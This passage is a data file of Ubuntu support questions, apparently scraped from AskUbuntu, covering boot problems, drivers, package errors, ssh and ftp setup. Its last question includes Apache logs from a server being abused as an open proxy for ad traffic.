, all to no avail . the only difference now is that , with the version from the ppa , libreoffice now crashes before it even loads a blank document , rather than when trying to open a file .
413592	help with grub2 booting ubuntu	my ubuntu system fails to boot after modifying file /etc/default/grub , even if i withdraw the modification later . i have a pc with four operating systems : 1 . ubuntu with grub2 ; 2 , centos ; 3 , debian ; and 4 gentoo . the one that that crashes is ubuntu . that is why i post the question here . due to a recent update from gentoo that requires the installation of systemd , i need to change the configuration of grub2 installed in ubuntu , specifically two steps : modfication 1 : add extra lines : init=/usr/lib/systemd/systemd to the menuentry of gentoo in /boot/grub/grub.cfg . this modification will definately not impact the boot of other systems . modfication 2 : add grub_cmdline_linux= '' init=/usr/lib/systemd/systemd '' in /etc/default/grub of ubuntu system , which systemd is not installed . of course the second modification is not right to my case because in ubuntu there is no systemd installed ( these is nothing in /usr/lib/systemd/systemd of ubuntu ) . however , the second modification becomes a troublemaker . after adding this line , the system fails to boot into ubuntu ( the grub menu still works ) . realizing the problem , i decide to withdraw the second modification . however , when i boot ubuntu again , the system freezes with the following screen : target filesystem des n't have requested /usr/lib/systemd/systemd busybox v1.20.2 ( debian 1:1.20.0-7 ) multi-call binary usage : switch_root '-c /dev/console ] new_root new_init [ args } free initramfs and switch to another root fs : chroot to new_root , delete all in / , move new_root to / . execute new_init . pid must be 1 new_root must be a mountpoint . -c dev reopen stdio to dev the reset can only be done by switching off and then on the pc , not rather by ctrl+alt+del . this problem is 100 % reproducable . as ubuntu fails to work , i installed grub2 from debian system . the exactly the same screen appears after i conducted the modification 2 on /etc/default/grub in debian system and rebooted debian with modification withdrawn . can any one please give help on this issue ? now only centos is working , from which i am writting this help question in askubuntu .
413593	shrink desktop ubuntu 12.10 armhf	i have just booted ubuntu on the mele a1000g and the desktop is slightly to large for my flatscreen tv . you ca n't really see the toolbar at the bottom except for a sliver of it . i have no idea what i am doing because i have never used ubuntu before . any help would be appreciated . i am running armhf 12.10 .
413594	what does no bootable medium found mean in a vitrual box	i have recently been trying to install virtual box , when this message came up : no bootable medium found ! . can somebody please tell me what went wrong ?
413596	gui will not boot without recovery mode	i 've run into this problem several times before . it seems to happen after an update . i 'm using refind on a macbook pro to start ubuntu . if i boot ubuntu , it seems to go through all of the normal boot procedures with no errors . however , after an update it will sometimes just boot to the terminal instead of the gui . i can log in and do everything , but i 'm not sure how to start the gui at this point . running startx does nothing . i can get around this by using grub and booting from recovery mode . i do n't actually have to do anything while i 'm in recovery mode , i just have to start recovery mode and then immediately select resume ( normal boot ) and the gui will load . is there anything i can do to diagnose this problem or make sure that the gui always starts on a normal boot ?
413597	recommended size in percentage for each partition	i have seen most of dedicated hosting companies servers always have multiple partition for various folders . i have tried to follow some guide lines on my own on virtual box . i always use swap space as double the ram . let 's say ts = total size ss = swap size ms = main size ms = ts - ss what is bellow is percentage on ms. / 20 % /boot 100m /var 25 % /home 24 % /usr 10 % /tmp 200m /opt 10 % it looks like i still need some key places i should give more space and some other places i should reduce space for example /usr and /var . your contribution would be greatly .
413599	mtp access to my phone lg-e900 ( optimus 7 ; windows phone 7.8 ) from ubuntu ?	happy new year 2014 ! is there a solution in order to give mtp access to lg optimus 7 ( lg-e900 ) from ubuntu ? ( i can see `` storage '' in the phone device on ubuntu 13.10 but if i double-click on it , i have error message `` libmtp error* : could not get object handles . '' thanks in advance for your help . gigi
413600	how do i lock my amd overscan to 0 % with hdmi ?	i use an external monitor with my laptop , connected over hdmi . every time i boot , the viewable area in the monitor is always reduced . running the amd catalyst control centre and setting my display to 0 % overscan resolves the issue , but i have to do this every time i boot the computer . i always ensure my hdmi cable is connected before i start my laptop . i have an amd radeon hd 7700m series , using amd proprietary drivers .
413602	how to recover windows 7 files	i want to recover windows 7 files installed on my c : drive . ubuntu is installed on my d : drive . how can i recover files on my windows installation ?
413604	avahi upgrade failes	uname -a linux nas 3.5.0-41-generic # 64~precise1-ubuntu smp thu sep 12 16:50:04 utc 2013 x86_64 x86_64 x86_64 gnu/linux can you help me with this one ? sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : avahi-daemon 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 30 not fully installed or removed . need to get 0 b/69.7 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 259768 files and directories currently installed . ) preparing to replace avahi-daemon 0.6.30-5ubuntu2 ( using ... /avahi-daemon_0.6.30-5ubuntu2.1_amd64.deb ) ... avahi-daemon stop/waiting unpacking replacement avahi-daemon ... dpkg : error processing /var/cache/apt/archives/avahi-daemon_0.6.30-5ubuntu2.1_amd64.deb ( -- unpack ) : trying to overwrite '/etc/avahi/services ' , which is also in package udisks 1.0.4- 5ubuntu2.1 avahi-daemon start/running , process 942 processing triggers for ureadahead ... errors were encountered while processing : /var/cache/apt/archives/avahi-daemon_0.6.30-5ubuntu2.1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
413605	help needed setting up rfc 868 ( port 37 ) time service on ubuntu 12.04	i have ubuntu 12.04 running inside virtualbox on windows 7 . i also have an older development platform which needs to set its internal clock by using the old time protocol . i 'll admit that i 'm by no means a sysadmin , ( although this has experience has shown me the need to learn more ) , and since there seems to be nothing on the net on how to do this ... what i 've done so far : sudo apt-get update sudo apt-get install nfs-common nfs-kernel-server xinetd ; ; nfs needed too my edited /etc/xinetd.d/time : # default : off # description : an rfc 868 time server . this protocol provides a # site-independent , machine readable date and time . the time service sends back # to the originating source the time in seconds since midnight on january first # 1900 . # this is the tcp version . service time { disable = no type = internal id = time-stream socket_type = stream protocol = tcp user = root wait = no } # this is the udp version . service time { disable = yes type = internal id = time-dgram socket_type = dgram protocol = udp user = root wait = yes } it needs tcp so i changed 'disable ' to 'no ' . did this : sudo /etc/init.d/xinetd restart the documentation said check the port with telnet : sudo telnet localhost 37 trying 127.0.0.1 ... connected to localhost . escape character is '^ ] ' . ? gconnection closed by foreign host . having never used telnet , ( do n't laugh ... ) , i do n't even know what this means , so i believed that i might need to open up the firewall : sudo iptables -a input -p tcp -- dport 37 -j accept sudo iptables -l chain input ( policy accept ) target prot opt source destination accept tcp -- anywhere anywhere tcp dpt : time accept all -- anywhere anywhere chain forward ( policy accept ) target prot opt source destination accept all -- anywhere anywhere chain output ( policy accept ) target prot opt source destination which is probably wrong . the software i 'm attempting to use says it ca n't set its time via the network so i hope that someone can help me out . thanks .
413606	closing laptop lid causes hibernation with xmonad	i use xmonad . when i close my laptop , the computer goes to sleep . i would like to stop this . i want the computer to continue operating normally when the lid closes . i use ubuntu 13.10 . any advice ? la /etc/acpi/ returns : -rwxr-xr-x 1 root root 391 oct 9 2012 asus-keyboard-backlight.sh -rwxr-xr-x 1 root root 180 oct 9 2012 asus-wireless.sh drwxr-xr-x 2 root root 4.0k oct 23 18:59 events -rwxr-xr-x 1 root root 608 oct 9 2012 ibm-wireless.sh -rwxr-xr-x 1 root root 2.2k aug 16 10:54 powerbtn.sh -rwxr-xr-x 1 root root 455 oct 9 2012 tosh-wireless.sh -rwxr-xr-x 1 root root 238 oct 9 2012 undock.sh
413616	how to reinstall windows 8	i installed ubuntu removing windows . i now want to reinstall windows 8 , so i have downloaded a windows 8 iso . my laptop is asus and has uefi , so how can i reinstall windows ? it does not bootswith the boot-able flash drive , please help me !
413618	how to access the internet on ubuntu 12.10 armhf	how will i go about connecting to wireless internet with ubuntu 12.10 armhf ? how to install the chromium browser ?
413622	how to clean folder leftovers of the apps that are no longer in use ?	i 'm running ubuntu 12.04 and i 'd like to know are there possibilities to clean folder leftovers of the apps that i do n't use anymore and not planning to again . for example in /home when i press ctrl+h folders appear and some of them belong to apps that i do n't use anymore and i have to manually to search for them and delete each by one . so i wonder are there any commands i can use in terminal to clean those leftovers , if they are ?
413624	how can i find my dhcp server ?	on my lan there are multiple dhcp servers running , and all of them are on the same range . now i use a machine which has a dynamic ip address from a dhcp server . i have to know from which server it comes . how to do that ? !
413627	unable to get 2560x1440 to output through dvi	i am attempting to get a display resolution of 2560x1440 to operate correctly through dvi output on my lenovo thinkcentre m71e running ubuntu 12.04 . the computer has both vga and dvi connectors . when i use the vga connector i get the full 2560x1440 resolution of my monitor just fine . infact this is autodetected as the default resolution with no config on my part . the only issue is some ghosting in the image due to the analog connection . the output of xrandr at this point is as follows : % xrandr screen 0 : minimum 320 x 200 , current 2560 x 1440 , maximum 8192 x 8192 vga1 connected 2560x1440+0+0 ( normal left inverted right x axis y axis ) 597mm x 336mm 2560x1440 60.0*+ 1920x1080 60.0 1680x1050 74.9 1280x1024 75.0 60.0 1440x900 59.9 1152x864 75.0 1280x720 60.0 1024x768 75.1 60.0 800x600 72.2 75.0 60.3 56.2 640x480 75.0 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) note that x believes the computer has vga , hdmi , and dp ( displayport ? ) connections . it infact has vga and dvi . when i use the dvi connector i get only 1680x1050 resolution , and xrandr reports the following : % xrandr screen 0 : minimum 320 x 200 , current 1680 x 1050 , maximum 8192 x 8192 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1680x1050+0+0 ( normal left inverted right x axis y axis ) 597mm x 336mm 1680x1050 60.0* 1280x1024 75.0 60.0 1440x900 59.9 1152x864 75.0 1280x720 60.0 1024x768 75.1 60.0 800x600 72.2 75.0 60.3 640x480 75.0 60.0 720x400 70.1 dp1 disconnected ( normal left inverted right x axis y axis ) note it believes to be connected over hdmi , not dvi . i can try to force the correct resolution over dvi as shown below , but this simply results in a blank display . % gtf 2560 1440 60.0 # 2560x1440 @ 60.00 hz ( gtf ) hsync : 89.40 khz ; pclk : 311.83 mhz modeline `` 2560x1440_60.00 '' 311.83 2560 2744 3024 3488 1440 1441 1444 1490 -hsync +vsync % xrandr -- newmode `` 2560x1440_60.00 '' 311.83 2560 2744 3024 3488 1440 1441 1444 1490 -hsync +vsync % xrandr -- addmode hdmi1 2560x1440_60.00 % xrandr -- output hdmi1 -- mode 2560x1440_60.00 notes : the computer has an intel core i5-2400 cpu with integrated graphics `` intel hd graphics 2000 '' . the dvi cable is a dual-link dvi cable that came with the monitor , so i believe it should support the 2560x1440 resolution . the monitor is a dgm ips-2701wph ( http : //www.scan.co.uk/products/27-dgm-ips-2701wph-pro-led-ips-monitor-hdmi-displayport-dvi-dvi-vga-2560x1440-350cd-m2-80k1-6ms-vesa ) i have also tried using cvt instead of gtf to generate the new modeline . this results in a much lower pixel clock of 241.5mhz ( matches exactly the maximum pixel clock value from display manual ) . unfortunately the screen still turns blank when i try this . % cvt -r 2560 1440 # 2560x1440 59.95 hz ( cvt 3.69m9-r ) hsync : 88.79 khz ; pclk : 241.50 mhz modeline `` 2560x1440r '' 241.50 2560 2608 2640 2720 1440 1443 1448 1481 +hsync -vsync % xrandr -- newmode `` 2560x1440r '' 241.50 2560 2608 2640 2720 1440 1443 1448 1481 +hsync -vsync % xrandr -- addmode hdmi1 2560x1440r % xrandr -- output hdmi1 -- mode 2560x1440r
413628	canon pixma ip1500 driver	i 'm running ubuntu 12.04 lts on an old pc . is there a driver that will work for an old canon ip1500 printer ?
413629	how to access information on sd cards ubuntu 12.10	i am running the arm version of ubuntu 12.10 . i need to install programs and view videos and such from an sd card . is that possible , and how could i accomplish that ? thanks in advance ! p.s . i am having a screen error , so i can not see my entire desktop . for example , i ca n't access the toolbar or anything . it is very discouraging and i ca n't find a solution . if you have any ideas for that problem , answer my other question that addresses that . or , put it in the comments here : )
413633	can not install lazarus after fixing broken packages	i 'm trying to install lazarus from here . i had broken packages , but i fixed the problem by removing sources in gedit /var/lib/dpkg/status as described here . then i tried to install lazarus again , and the lazarus itself installs , but fpc and fpc-src packages can not be installed . it gives me this error : reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 374429 files and directories currently installed . ) unpacking fpc-src ( from /tmp/fpc-src_2.6.2-0_amd64.deb ) ... dpkg : error processing /tmp/fpc-src_2.6.2-0_amd64.deb ( -- install ) : trying to overwrite '/usr/share/fpcsrc/2.6.2/rtl/nativent/tthread.inc ' , which is also in package fpc-source-2.6.2 2.6.2-5 dpkg-deb ( subprocess ) : decompressing archive member : internal gzip write error : broken pipe dpkg-deb ( subprocess ) : can not copy archive member from '/tmp/fpc-src_2.6.2-0_amd64.deb ' to decompressor pipe : failed to write ( broken pipe ) dpkg-deb : error : subprocess < decompress > returned error exit status 2 errors were encountered while processing : if i install regular fpc from software center , it deletes lazarus . and , before i installed lazarus i removed all previous folders including .lazarus folder in home directory , so , when i install regular lazarus , it says that it 's installed in software center , but it can not be found in dash , although .lazarus folder exists . i have also tried to remove it by using this instructions , and reinstall , but the same problem persists . i also tried this , and it did n't help too . please help ! thank you !
413637	ca n't install libav-tools or ffmpeg in ubuntu 12.04	i 'm trying to follow the instruction given here how to generate a mov-file from png images ? to make a video out of a bunch of png images . all packages are installed except for libav-tools . when i attempt to install it i get this output , which roughly translates to : the following packages have unmet dependencies : â libav-tools : depends : ffmpeg ( > = 4:0.10~ ) but will not be installed e : the problems could not be fixed , you have held broken packages . if i try sudo apt-get install ffmpeg , i get this output which translates : the following packages have unmet dependencies : ffmpeg : depends : libavcodec53 ( > = 4:0.10.2-0ubuntu0jon1 ) but it will not be installed libavcodec-extra-53 ( > = 4:0.10.2 ) pero 4:0.8.9ubuntu0.12.04.1 will be installed depends : libavdevice53 ( > = 4:0.10.2-0ubuntu0jon1 ) but it will not be installed libavdevice-extra-53 ( > = 4:0.10.2 ) pero 4:0.8.9ubuntu0.12.04.1 will be installed depends : libavfilter2 ( > = 4:0.10.2-0ubuntu0jon1 ) but it will not be installed libavfilter-extra-2 ( > = 4:0.10.2 ) pero 4:0.8.9ubuntu0.12.04.1 will be installed depends : libavformat53 ( > = 4:0.10.2-0ubuntu0jon1 ) but it will not be installed libavformat-extra-53 ( > = 4:0.10.2 ) pero 4:0.8.9ubuntu0.12.04.1 will be installed depends : libavutil51 ( > = 4:0.10.2-0ubuntu0jon1 ) but it will not be installed libavutil-extra-51 ( > = 4:0.10.2 ) pero 4:0.8.9ubuntu0.12.04.1 will be installed depends : libpostproc52 ( > = 4:0.10.2-0ubuntu0jon1 ) but it will not be installed libpostproc-extra-52 ( > = 4:0.10.2 ) pero 4:0.8.9ubuntu0.12.04.1 will be installed depends : libswresample0 ( > = 4:0.10.2-0ubuntu0jon1 ) but it will not be installed libswresample-extra-0 ( > = 4:0.10.2 ) but it is not installable depends : libswresample0 ( < 4:0.10.2-99 ) but it will not be installed libswresample-extra-0 ( < 4:0.10.2.99 ) but it is not installable depends : libswscale2 ( > = 4:0.10.2-0ubuntu0jon1 ) but it will not be installed libswscale-extra-2 ( > = 4:0.10.2 ) pero 4:0.8.9ubuntu0.12.04.1 will be installed e : the problems could not be fixed , you have held broken packages . how could i fix this ?
413639	are there any fees that must be payed to ubuntu as an source code management server ?	i want to use ubuntu ( server ) as our new source-code server ( at the moment , we are using a windows server ) in the company where i work . are there any costs ( license fee , taxes , etc . ) i have to pay for ? the server would be only for internal use ( git-server ) . i read many things about ubuntu/linux and commercial use - but now i am very confused about that topic .
413645	how to put back unity lens ?	i did sudo apt-get autoremove unity-lens-music unity-lens-photos unity-lens-gwibber unity-lens-shopping unity-lens-video how can i put it back please - using ubuntu 13.04 .
413650	how to connect to another computer through the internet using ssh ?	i have ubuntu 13.10 on my laptop which i would like to use to connect to my ubuntu 12.04 desktop . i installed the open ssh server on the desktop machine using : sudo apt-get install openssh-server i checked that the server is running : sudo service ssh start and i get : start : job is already running : ssh next i checked if there is a firewall using : sudo ufw status and i get : status : inactive next i found out the desktop 's ip address by executing : ip addr | grep inet and i get : inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host inet 193.51.236.62/24 brd 193.51.236.255 scope global eth0 inet6 fe80 : :21a : a0ff : fe10 : e8da/64 scope link so i suppose that 193.51.236.62 is my ip address . then on my laptop i verify that 193.51.236.62 is pingable and then i do : ssh -v martin @ 193.51.236.62 and i get : openssh_6.2p2 ubuntu-6ubuntu0.1 , openssl 1.0.1e 11 feb 2013 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : connecting to 193.51.236.62 [ 193.51.236.62 ] port 22 . and nothing else seems to be happening . please , how can i troubleshoot this problem ? what am i doing wrong ? edit : i can safely ping the server machine : martin @ martin-studio-1537 : ~ $ ping -c3 193.51.236.62 ping 193.51.236.62 ( 193.51.236.62 ) 56 ( 84 ) bytes of data . 64 bytes from 193.51.236.62 : icmp_seq=1 ttl=61 time=2.82 ms 64 bytes from 193.51.236.62 : icmp_seq=2 ttl=61 time=4.05 ms 64 bytes from 193.51.236.62 : icmp_seq=3 ttl=61 time=4.08 ms -- - 193.51.236.62 ping statistics -- - 3 packets transmitted , 3 received , 0 % packet loss , time 2002ms rtt min/avg/max/mdev = 2.823/3.653/4.082/0.587 ms edit2 : i tried to diagnose the connection using nmap as suggested : martin @ martin-studio-1537 : ~ $ nmap 193.51.236.62 starting nmap 6.40 ( http : //nmap.org ) at 2014-01-31 18:39 cet note : host seems down . if it is really up , but blocking our ping probes , try -pn nmap done : 1 ip address ( 0 hosts up ) scanned in 3.06 seconds and then : martin @ martin-studio-1537 : ~ $ nmap -pn 193.51.236.62 starting nmap 6.40 ( http : //nmap.org ) at 2014-01-31 18:40 cet nmap scan report for 193-51-236-62.lille.inria.fr ( 193.51.236.62 ) host is up ( 0.0056s latency ) . not shown : 998 filtered ports port state service 3128/tcp open squid-http 8080/tcp open http-proxy nmap done : 1 ip address ( 1 host up ) scanned in 8.18 seconds
413653	how to install m23 server on ubuntu ?	i would like to use m23 to maintain a cluster of other ubuntu machines , but unfortunately i ca n't find any documentation how to install m23 server on an ubuntu machine . neither are there any packages for ubuntu . does anybody know how to install m23 on an ubuntu machine ? update : the debian source does not work for ubuntu the following packages have unmet dependencies : m23 : depends : apache-common ist aber nicht but is not going to be installed apache2.2-common ist but is not going to be installed that is strange , because of the fact that apache is installed . what ever , trying to install the package leads to an error : package 'apache-common ' has no installation candidate i think , the problem is , that the packages in ubuntu have a different name . is that possible ?
413658	how to delete files and subdirectories by size and age ?	i have a ubuntu server 12.10 which receives images from a camera by ftp , i receive the images in a directory with a fixed quote on the server and i need to delete the oldest images first , i would like to keep 1gb free for new images . i have followed this thread but can not find the solution there . autotrash would be a good command but i do not have gnome installed . does anybody have any suggestions ?
413661	root user and super user	how is being the root user different from being the super user ? if it is different anyways , is there a way to use the shell as the root ? is there a root password for that ? is it different from the super user password ?
413663	what 's the purpose of /etc/pm/config.d and power.d ?	what is the purpose of /etc/pm/config.d and /etc/pm/power.d ? it 's my understand that scripts in /etc/pm/sleep.d are run at the time of a power management event such as the computer sleeping , hibernating , resuming and thawing . what would i use the config.d and power.d directories for ?
413668	disk naming convention in preseed vs manual installation	when i try to install ubuntu 12.04 onto a dell poweredge r710 via preseed , the auto install first disk is always coming up as /dev/sdc . as per the docs it should be /dev/sda . i looked at /var/lib/partman/devices , its does show /dev/sdc . on the same server if i try to install ubuntu 12.04 manually then the first disk showing as /dev/sda . any idea why preseed auto install and manual install have different disk naming conventions ?
413673	wd elements external hdd does n't mount	i 'm attempting to mount a wd elements 1 tb drive on linux , however it does not work . the drive is only visible through gparted . when i reformat the drive while on linux , partitions work no matter what - fat , ntfs , ext it all mounts fine . however , after one reboot it 's impossible to mount it . this happens on all my linux installs , while the drive works on all windows installations i tried it with . i 'm using 64-bit ubuntu 13.10 . edit : unmounting/unpowering before unplugging the device is what i was doing , and the drive still always appears the same after a reboot - in the `` disks '' application , without any partitions ( although gparted sees them ) .
413675	alternatives on ubuntu	this is not question about how linux works or something similar . i just want ask if is there some similar application like xilisoft video converter and sony vegas pro 10 . because i need an application , where i can edit a video , add subtitles , convert and more . and something like vegas pro for editing videos ( like cutting , color edits , add music and other ) . thanks . edit : + software like notepad++
413676	ubuntu is not showing other drive	i am pretty new to ubuntu and i have installed ubuntu 13 latest version . so basically i was having windows before ubuntu os , so when i try to install ubuntu i got option saying replace windows 7 with ubuntu and i have selected that option . so after doing this i am successfully able to install ubuntu but now it is not showing my any other drive which is d and e. i have 320 gb hard-disk and it is all showing in main drive of ubuntu so what i think is ubuntu have formatted my full laptop but still i am not sure whether this is correct or not . so how can i get back my all drive if is is possible ? or has ubuntu formatted it ? i do n't know anything now . please help me to solve this .
413677	vsftpd : 530 login incorrect	i cant get vsfptd working on ubuntu 12.04. my vsftpd.conf file looks like this and i try to connect with a local user : listen=yes anonymous_enable=no local_enable=yes write_enable=yes dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=yes secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/ssl/private/vsftpd.pem error message in filezilla : response : 331 please specify the password . command : pass **** response : 530 login incorrect .
413679	need to disable control key and al so the print characters	how can i disable control characters and also printing the control characters ? i used the below code to disable the control characters but its printing ^c when i press the ctrl + c..i need to disable the printing as well.. 1 trap '' 2 2 echo `` this is a test hit ctrl + c to test it '' 3 sleep 20 4 trap 2
413680	web server atacks	i have a server ( vps ) to use as a repository and testing ( gitlab and redmine ) server . however apache crashed , seeing the /var/log/apache2/error.log have many errors of this type : [ fri jan 31 16:07:31.056851 2014 ] [ : error ] [ pid 1538 ] [ client 63.141.239.204:4740 ] script '/var/www/ads.php ' not found or unable to stat , referer : http : //www.wealthsuperman.com/index.php/component/k2/item/1017-3-industry-impacting-innovations-on-the-horizon [ fri jan 31 16:07:31.377531 2014 ] [ : error ] [ pid 1549 ] [ client 216.244.79.163:2282 ] script '/var/www/ads.php ' not found or unable to stat , referer : http : //www.movieseeing.com/index.php ? option=com_content & view=article & id=2244 : bin-aflek-kevin-names-directory & catid=45 : superman-movie & itemid=418 [ fri jan 31 16:07:31.538993 2014 ] [ : error ] [ pid 1436 ] [ client 23.88.201.68:4073 ] script '/var/www/banner_728x90.php ' not found or unable to stat , referer : : //www.worldfinancialtoday.com/index.php ? option=com_content & view=article & id=481:2011-07-01-23-20-39 & catid=41 : debt-management & itemid=224 [ fri jan 31 16:07:32.267787 2014 ] [ : error ] [ pid 1573 ] [ client 216.244.87.196:4726 ] script '/var/www/banner_160x600.php ' not found or unable to stat , referer : http : //www.sexwomanbaby.com/index.php ? option=com_content & view=category & layout=blog & id=37 & itemid=71 & limitstart=351 [ fri jan 31 16:07:32.576526 2014 ] [ : error ] [ pid 1383 ] [ client 198.50.177.34:3046 ] script '/var/www/ads.php ' not found or unable to stat , referer : http : //www.healthlifeways.com/healthy-eating-2/2000-i-want-to-eat-healthy-i-want-to-lose-weight-and-eat-healthy-vegetarian.html [ fri jan 31 16:07:34.948099 2014 ] [ : error ] [ pid 1525 ] [ client 208.115.124.196:4361 ] script '/var/www/banner_300x250.php ' not found or unable to stat , referer : http : //www.gamebabygirls.com/index.php ? option=com_content & view=article & id=1991 : how-to-download-games-onto-your-psp-for-free-free-games-to-download & catid=58 : free-game-downloads & itemid=182 [ fri jan 31 16:07:35.492746 2014 ] [ : error ] [ pid 1429 ] [ client 192.187.124.67:3583 ] script '/var/www/ads.php ' not found or unable to stat , referer : http : //www.entainmentworld.com/index.php/chicago-entertainment-2/262-ipelinecom-seattle-entertainment [ fri jan 31 16:07:35.938016 2014 ] [ : error ] [ pid 1524 ] [ client 172.246.42.245:1589 ] script '/var/www/banner_160x600.php ' not found or unable to stat , referer : : //www.galacticearthalliance.com/index.php ? option=com_content & view=category & layout=blog & id=43 & itemid=226 /var/log/apache2/other_vhosts_access.log 127.0.0.1:80 64.120.60.118 - - [ 01/feb/2014:00:49:40 +0000 ] `` get http : //ads.yahoo.com/st ? ad_type=iframe & ad_size=728x90 & section=4931465 & pub_url= $ { pub_url } http/1.0 '' 404 494 `` http : //happyhourstravel.com/index.php/international-travel/4088-china-eastern-airline '' `` opera/10.60 ( windows nt 5.1 ; u ; en-us ) presto/2.6.30 version/10.60 '' 127.0.0.1:80 74.63.197.142 - - [ 01/feb/2014:00:49:40 +0000 ] `` get http : //ads.yahoo.com/st ? ad_type=iframe & ad_size=300x250 & section=3698931 & pub_url= $ { pub_url } http/1.0 '' 404 494 `` http : //www.mortcard.com/index.php ? option=com_content & view=article & id=14 : amount-of-pay-earned-for-a-kindergarten-teacher -- & catid=13 '' `` mozilla/5.0 ( windows ; u ; windows nt 6.0 ; en-us ; rv:1.9.0.6 ) gecko/2009011913 firefox/3.0.6 '' 127.0.0.1:80 142.54.183.92 - - [ 01/feb/2014:00:49:40 +0000 ] `` get http : //ads.yahoo.com/st ? ad_type=iframe & ad_size=728x90 & section=5245782 & pub_url= $ { pub_url } http/1.0 '' 404 494 `` http : //www.healthlifeways.com/healthy-eating-2/18-healthy-life/3339-what-is-a-healthy-balanced-diet-what-is-healthy-life.html '' `` mozilla/5.0 ( x11 ; linux x86_64 ) applewebkit/534.36 ( khtml , like gecko ) chrome/13.0.766.0 safari/534.36 '' 127.0.0.1:80 216.244.79.171 - - [ 01/feb/2014:00:49:40 +0000 ] `` get http : //ads.yahoo.com/st ? ad_type=iframe & ad_size=728x90 & section=5280785 & pub_url=themoviebus.com http/1.0 '' 404 494 `` http : //www.themoviebus.com/index.php/37-news/slideshow/67-donec-nec-feugiat-felis '' `` mozilla/4.08 [ en ] ( winnt ; u ) '' 127.0.0.1:80 198.2.200.40 - - [ 01/feb/2014:00:49:40 +0000 ] `` get http : //ib.adnxs.com/ttj ? id=2023417 & position=above http/1.0 '' 404 494 `` http : //www.gameuloved.com/ ? cat=3 '' `` opera/9.80 ( windows nt 5.1 ; u ; it ) presto/2.7.62 version/11.00 '' 127.0.0.1:80 107.148.8.58 - - [ 01/feb/2014:00:49:40 +0000 ] `` get http : //ib.adnxs.com/ttj ? id=2142019 http/1.0 '' 404 494 `` http : //www.new-energy-auto.com/ ? p=548 '' `` mozilla/5.0 ( windows ; u ; windows nt 6.0 ; fr-fr ) applewebkit/533.18.1 ( khtml , like gecko ) version/5.0.2 safari/533.18.5 '' 127.0.0.1:80 63.141.239.206 - - [ 01/feb/2014:00:49:40 +0000 ] `` get http : //ad.yieldmanager.com/st ? ad_type=pop & ad_size=0x0 & section=5073837 & banned_pop_types=28 & pop_times=1 & pop_frequency=86400 & pub_url= $ { pub_url } http/1.0 '' 404 500 `` http : //www.healthlifeways.com/healthy-eating-2/4591-eat-drink-be-healthy-eat-healthy-magazine.html '' `` mozilla/5.0 ( windows ; u ; windows nt 5.1 ; en-us ; rv:1.8.1.4 ) gecko/20070515 firefox/2.0.0.4 '' 127.0.0.1:80 23.228.234.115 - - [ 01/feb/2014:00:49:40 +0000 ] `` get http : //ib.adnxs.com/ttj ? id=1165515 http/1.0 '' 404 494 `` http : //www.liekkas.com/ ? tag=pc '' `` mozilla/4.0 ( compatible ; msie 7.0b ; windows nt 5.1 ; .net clr 1.1.4322 ; .net clr 2.0.50727 ) '' 127.0.0.1:80 199.231.212.25 - - [ 01/feb/2014:00:49:41 +0000 ] `` get http : //ib.adnxs.com/ttj ? id=2169359 & cb= [ cachebuster ] & referrer= [ referrer_url ] http/1.0 '' 404 494 `` : //www.twotags.com/o~c-clothing~a-ap_gender_age_women-24330635_v_neck~b-31515.aspx '' `` mozilla/4.75 [ en ] ( win98 ; u ) '' 127.0.0.1:80 137.175.9.44 - - [ 01/feb/2014:00:49:42 +0000 ] `` get http : //ads.deliads.com/ttj ? id=2069500 & referrer=financialgately.com http/1.0 '' 404 497 `` http : //www.financialgately.com/ ? p=748 '' `` mozilla/5.0 ( windows nt 6.1 ; wow64 ; rv:2.0b8pre ) gecko/20101114 firefox/4.0b8pre '' 127.0.0.1:80 198.56.202.213 - - [ 01/feb/2014:00:49:42 +0000 ] `` get http : //ib.adnxs.com/ttj ? id=2168277 & position=above http/1.0 '' 404 494 `` http : //www.fulleducate.com/ ? p=723 '' `` mozilla/5.0 ( macintosh ; u ; intel mac os x 10_6_3 ; ru-ru ) applewebkit/533.16 ( khtml , like gecko ) version/5.0 safari/533.16 '' 127.0.0.1:80 198.2.208.247 - - [ 01/feb/2014:00:49:42 +0000 ] `` get http : //ib.adnxs.com/ttj ? id=2048452 & position=above http/1.0 '' 404 494 `` http : //www.everyloans.net/ ? p=562 '' `` mozilla/5.0 ( x11 ; u ; linux i686 ; en-us ; rv:1.9.2.7 ) gecko/20100726 centos/3.6-3.el5.centos firefox/3.6.7 '' 127.0.0.1:80 63.141.244.45 - - [ 01/feb/2014:00:49:42 +0000 ] `` get http : //ads.yahoo.com/st ? ad_type=iframe & ad_size=300x250 & section=5233043 & pub_url=probuinessp.com http/1.0 '' 404 494 `` http : //probuinessp.com/index.php/small-business-marketing-ideas/ '' `` mozilla/5.0 ( windows nt 6.1 ; wow64 ; rv:2.0b6pre ) gecko/20100903 firefox/4.0b6pre '' 127.0.0.1:80 174.34.159.13 - - [ 01/feb/2014:00:49:42 +0000 ] `` get http : //ib.adnxs.com/ttj ? id=2168373 & position=above http/1.0 '' 404 494 `` http : //www.searchthenewsofmovie.com/ ? p=742 '' `` mozilla/5.0 archlinux ( x11 ; u ; linux x86_64 ; en-us ) applewebkit/534.30 ( khtml , like gecko ) chrome/12.0.742.100 '' 127.0.0.1:80 192.169.85.115 - - [ 01/feb/2014:00:49:43 +0000 ] `` get http : //ads.yahoo.com/st ? ad_type=iframe & ad_size=728x90 & section=5151124 & pub_url= $ { 